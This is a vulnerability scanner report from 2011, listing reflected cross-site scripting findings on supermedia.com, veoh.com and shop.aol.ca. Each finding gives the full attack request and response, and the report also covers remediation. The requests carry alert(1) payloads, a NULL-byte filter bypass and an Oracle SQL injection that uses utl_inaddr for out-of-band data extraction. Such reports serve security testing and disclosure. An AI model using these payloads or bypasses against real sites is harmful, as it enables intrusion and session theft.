User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296763571|check#true#1296761771; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D
Referer: http://www.google.com/search?hl=en&q=fa04d"-alert(1)-"18e25f0779e

Response (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:48:20 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 24711


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=fa04d"-alert(1)-"18e25f0779e";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

1.492. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00f909a"-alert(1)-"0aedf1bf8a2 was submitted in the Referer HTTP header. This input was echoed as f909a"-alert(1)-"0aedf1bf8a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27 HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761536|check#true#1296759736; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D
Referer: http://www.google.com/search?hl=en&q=%00f909a"-alert(1)-"0aedf1bf8a2

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:07:09 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 20379


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=%00f909a"-alert(1)-"0aedf1bf8a2";
s.pageName="";
s.prop1="Processing Error Title";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="General Exception";
s.prop7="Badly formatted flow execution key ''||(utl_inaddr
...[SNIP]...

1.493. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ffa4"-alert(1)-"6ce0b4aea6f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/spportalFlow.do?'"--></style></script><script>alert(0x000043)</script> HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=288FFBAC45FB01B3489845E2C7FB3FFF.app3-a1; trafficSource=default; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139e45525d5f4f58455e445a4a42378b; mbox=check#true#1296759729|session#1296759634912-2644#1296761529; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D
Host: www.supermedia.com
Connection: Keep-Alive
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Referer: http://www.google.com/search?hl=en&q=2ffa4"-alert(1)-"6ce0b4aea6f

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:19:04 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 20424


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=2ffa4"-alert(1)-"6ce0b4aea6f";
s.pageName="";
s.prop1="Processing Error Title";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="General Exception";
s.prop7="Unable to extract the flow definition id parameter
...[SNIP]...

1.494. https://www.supermedia.com/spportal/spportalFlow.do(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C' [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C'

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00f3def"-alert(1)-"88a42c498f7 was submitted in the Referer HTTP header. This input was echoed as f3def"-alert(1)-"88a42c498f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /spportal/spportalFlow.do(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C' HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761701|check#true#1296759901; s_cc=true; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit
Referer: http://www.google.com/search?hl=en&q=%00f3def"-alert(1)-"88a42c498f7

Response (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:07:08 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 21226


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=%00f3def"-alert(1)-"88a42c498f7";
s.pageName="";
s.prop1="Processing Error Title";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="General Exception";
s.prop7="Badly formatted flow execution key ''||(utl_inaddr
...[SNIP]...

1.495. http://www.veoh.com/video/flag/permalinkId/v18978294NGnK88j8 [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /video/flag/permalinkId/v18978294NGnK88j8

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 266d5"><script>alert(1)</script>a3477cdc5c1 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /video/flag/permalinkId/v18978294NGnK88j8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)266d5"><script>alert(1)</script>a3477cdc5c1
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:15 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=70
Content-Length: 32288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<input type="hidden" value="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)266d5"><script>alert(1)</script>a3477cdc5c1" id="flagUserAgent" name="flagUserAgent"/>
...[SNIP]...

1.496. http://shop.aol.ca/store/list.adp [name of an arbitrarily supplied request parameter]  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.aol.ca
Path:   /store/list.adp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edadc"><script>alert(1)</script>81318b986fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /store/list.adp?edadc"><script>alert(1)</script>81318b986fe=1 HTTP/1.1
Host: shop.aol.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 03 Feb 2011 20:33:04 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 03 Feb 2011 21:03:04 GMT
Content-length: 146
Content-type: text/html
Location: http://shop2.aol.ca/store/list.adp?edadc"><script>alert(1)</script>81318b986fe=1
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive

<html>
<body>
Page relocated <a href="http://shop2.aol.ca/store/list.adp?edadc"><script>alert(1)</script>81318b986fe=1">here.</a>
</body>
</html>

Report generated by CloudScan Vulnerability Crawler at Fri Feb 04 13:40:37 CST 2011.